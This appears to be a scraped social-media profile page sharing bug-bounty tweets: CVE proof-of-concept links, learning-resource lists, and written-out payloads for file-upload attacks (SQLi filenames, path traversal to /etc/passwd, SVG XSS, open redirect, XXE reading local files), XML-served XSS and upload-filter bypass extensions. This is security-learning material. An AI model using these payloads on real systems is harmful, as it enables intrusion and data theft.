Olivia
Online
redditaddicted
@redditaddicted
daydreamer _ n00b
Joined February 2020
409 Following
9 Followers
108 Posts
Here is the list of traversal payloads I scraped from the internet. Not mine, credit to the respective authors.
https://t.co/pCqrs3zpUs
🚨PoC Released on CVE-2024-4879 - Jelly Template Injection Vulnerability in ServiceNow
🔥PoC Github:https://t.co/K5G9fVnlM2
🥳Video PoC: https://t.co/kg1Gdsja14
🆕 New Research: https://t.co/nI8WHmynsn
MomentJS Path Traversal to RCE (CVE-2022-24785) first ever published PoC (I believe).
https://t.co/t0RpEYBHD6
#CVE #javascript #PoC #BugBounty #Hacking #MomentJS #bugbountytips #RCE #PathTraversal
JWT Pentesting
10 Writeups to Hack with JWTs
1. https://t.co/AHLdX7SkDi
2. https://t.co/JE7fPt7cO0
3. https://t.co/qH5VwYMkcB
4. https://t.co/4W2igxoMjD (Labs)
5. https://t.co/w60WS9s1aI (Checklist/Methdology)
6. https://t.co/iRe5mwLjo0
7. https://t.co/1SsNLWvjdw (leaks from JWT)
8. https://t.co/ccfxBYU8c0
9. https://t.co/BcCgGtZ4Bo
10. https://t.co/96RAnwzap7 (Burp Plugin)
CVE-2024-34102: Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution.
PoC
https://t.co/XjtjhVHReX
Here are the top 40 YouTube channels to learn cybersecurity:
1. David Bombal
2. Null Byte
3. NetworkChuck
4. CYBER TRUTH
5. HackerSploit
6. CyberSecurty_PK
7. John Hammond
8. Cyber Insecurity
9. The Cyber Mentor
10. LearnCyberSecurity
11. GeraldAuger
12. HackerSploit
13. Sami Laiho
14. Navin Reddy
15. The PC Security Channel
16. Security Tube
17. OTW Cybersecurity
18. CyberTalkinators
19. Trace Labs
20. The Cyber Mentor
21. LiveOverflow
22. Cyber Secrets
23. HackerOne
24. HackingeBooks CTF
25. Seytonic
26. Cybr
27. Adrian Crenshaw
28. BlackHat Python
29. Cybr Expert
30. TechSavvy
31. TechNintra
32. SecurityIdiots
33. HackerOne
34. SemmleDev
35. Hackers.Mayuri
36. Hak5
37. Gabriel Alonso
38. CyberMentor
39. STÖK
40. Cyber Weapons Lab
Awesome Bug Bounty Writeups
Cross Site Scripting (XSS)
Cross Site Request Forgery (CSRF)
Clickjacking (UI Redressing Attack)
Local File Inclusion (LFI)
Subdomain Takeover
Authentication Bypass
SQL injection
and more.
https://t.co/Y81G1OgRdW
Contributor @0xAsm0d3us
Chaining Vulnerabilities through File Upload
SLQi
'sleep(20).jpg
sleep(25)-- -.jpg
Path traversal
../../etc/passwd/logo.png
../../../logo.png
XSS
-> Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"
-> Upload using .gif file
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
-> Upload using .svg file
<svg xmlns="https://t.co/ySXxLqtKTD" onload="alert(1)"/>
-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "https://t.co/QqVI2mCeis"><svg version="1.1" baseProfile="full" xmlns="https://t.co/ySXxLqtKTD">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("HolyBugx XSS");
</script>
</svg>
Open redirect
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='https://t.co/elljIWZkT5'"
xmlns="https://t.co/ySXxLqtKTD">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>
XXE
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="https://t.co/ySXxLqtKTD" xmlns:xlink="https://t.co/ACscdSiav1" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>
#bugbountytips #BugBounty #Pentesting #CyberSecurity #Security
![SuhradMakwana's tweet photo. Chaining Vulnerabilities through File Upload
SLQi
'sleep(20).jpg
sleep(25)-- -.jpg
Path traversal
../../etc/passwd/logo.png
../../../logo.png
XSS
-> Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"
-> Upload using .gif file
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
-> Upload using .svg file
<svg xmlns="https://t.co/ySXxLqtKTD" onload="alert(1)"/>
-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "https://t.co/QqVI2mCeis"><svg version="1.1" baseProfile="full" xmlns="https://t.co/ySXxLqtKTD">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("HolyBugx XSS");
</script>
</svg>
Open redirect
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='https://t.co/elljIWZkT5'"
xmlns="https://t.co/ySXxLqtKTD">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>
XXE
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="https://t.co/ySXxLqtKTD" xmlns:xlink="https://t.co/ACscdSiav1" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>
#bugbountytips #BugBounty #Pentesting #CyberSecurity #Security](https://pbs.twimg.com/media/F-FZQHabYAAqUhW.jpg)
Payloads that can be used in headers to bypass a 403
#bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd #infosec #cybersecurity #pentesting #redteam #informationsecurity #securitycipher #technology #coding #code #recon #ai #llm #owasp
Want to Learn IDOR ?
14 Blogs to Master IDOR
1. https://t.co/elcMkt4idd
2. https://t.co/9IdtRNjfW8
3. https://t.co/eM0FX2OfBw
4. https://t.co/CFWKy0mObW
5. https://t.co/1413M9iUVq
6. https://t.co/LzrfuZoKIG
7. https://t.co/lnSKonlr9q
8. https://t.co/MFJ6MmMKct
9. https://t.co/3jUXVMQmim
10. https://t.co/VTXhncqW56
11. https://t.co/DyfDrDFlSP
12. https://t.co/jCtLsDxR4h
13. https://t.co/rbfF4ZPz06
14. https://t.co/OhfoJw9ike
(Credit goes to the writers for the blog)
Account takeover techniques!
Since my @offensive_con talk is not out yet, I'll spoil it a little bit: you can use iconv() to get RCE on @roundcube. See you on Monday for part 2!
PHP just fixed one of my RCE vulnerabilities, which affects XAMPP by default. Check to see if you are affected and update now! 🔥
https://t.co/EQdzNTihOm
16 Top Search Engines for Cybersecurity Professionals in 2024:
1. Pulsedive - Search for Threat Intelligence
2. Censys - Assessing attack surface for Internet connected devices.
3. Binary Edge - Scans, acquire and classify public Internet data.
4. Shodan - Search for devices connected to the internet
5. ZoomEye - Cyberspace mapping
6. FullHunt - Search and Discovery attack surface
7. ONYPHE- Collects Cyber threat Intelligence data
8. Dehashed - View leaked Credentials
9. DorkSearch - Find information not readily available on a website
10. ExploitDB - Archive of various exploits in
11. PolySwarm - Scans URLs and Files for Malware
12. LeakIX - Search indexed public files/information
13. URL Scan - Scans and analyze websites
14. Vulners - Vulnerability Database
15. Hunter - Search for Email address belonging to a website
16. GreyNoise - A spam filter for internet threat alerts
Schedule Free Call with Me:
https://t.co/hAgx8ikBhn
#CyberSecurity #Hacking
CI/CD explained in simple terms.
We just released an article in our weekly newsletter breaking down;
— What is continuous integration
— What is continuous delivery
— Benefits & challenges
— CI/CD in practice
Missed the issue? Check it out here: https://t.co/V0UhWGdMyV
You can serve a #XSS payload from a XML file
<?xml version="1.0" encoding="UTF-8"?>
<html xmlns:html="https://t.co/6x50prGIfH">
<html:script>prompt(document.domain);</html:script>
</html>
#infosec #bugbountytips #bugbounty #owasp #Xss
A guide to SSRF vulnerabilities and where to find them in 2023!
🐞 Common Vulnerable Parameters
🐛 Webhook Integrations
🐜 File Imports
🕷 PDF Generators
🦟 Common Bypasses
🪲 HTTP Redirects
🪳 DNS Rebinding
🐞 Non-Standard IP Notations
Read now 👇
https://t.co/8QlzQvPApt
File Upload Bypass -
Blacklisting Bypass
PHP → .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
ASP → .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp → .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion → .cfm, .cfml, .cfc, .dbm
Perl → .pl, .cgi
Using random capitalization → .pHp, .pHP5, .PhAr
Whitelisting Bypass
file.png.php
file.png.Php5
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
file.png.php
file.png.pHp5
file.php#.png
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png
file.png.jpg.php
file.php%00.png%00.jpg
#bugbountytip #BugBounty #Pentesting #CyberSecurity #Security
Trends for you
Most Popular Users
Elon Musk 
@elonmusk
240.6M followers
Barack Obama
@barackobama
119.2M followers
Donald J. Trump
@realdonaldtrump
111.7M followers
Cristiano Ronaldo
@cristiano
110.5M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.6M followers
NASA
@nasa
92.2M followers
Justin Bieber
@justinbieber
90.9M followers
KATY PERRY
@katyperry
87.6M followers
Taylor Swift
@taylorswift13
81.4M followers
Lady Gaga
@ladygaga
73M followers
Virat Kohli
@imvkohli
69.8M followers
Kim Kardashian
@kimkardashian
69.8M followers
YouTube
@youtube
68.7M followers
Bill Gates
@billgates
63.9M followers
Neymar Jr
@neymarjr
62.5M followers
The Ellen Show
@theellenshow
62.4M followers
CNN
@cnn
61.9M followers
X
@x
60.8M followers
Selena Gomez
@selenagomez
60.7M followers